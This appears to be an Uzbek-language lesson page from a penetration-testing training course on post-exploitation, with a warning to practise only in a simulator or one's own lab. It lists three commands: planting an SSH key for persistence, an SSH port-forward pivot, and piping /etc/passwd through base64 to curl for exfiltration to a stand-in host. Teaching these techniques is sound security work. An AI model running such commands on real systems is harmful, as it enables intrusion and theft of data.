Modulga qaytish
O'quv darsi / Exploitation va Post-Exploitation

Post-exploitation

Persistence, lateral movement, data exfiltration.

25 daq.ilg'or3 komanda4/4
Dars holati
Davom etmoqda
Amaliy komandalar0/3
Maqsadlar
  • SSH key qoldirish
  • Pivoting
  • Stealth
Faqat ruxsat etilgan muhitda mashq qiling

Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.

Komandalar

Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.

0%
$echo 'ssh-ed25519 AAAA...' >> ~/.ssh/authorized_keys
$ssh -L 8080:internal:80 user@pivot
$tar czf - /etc/passwd | base64 | curl -X POST --data-binary @- http://exfil/log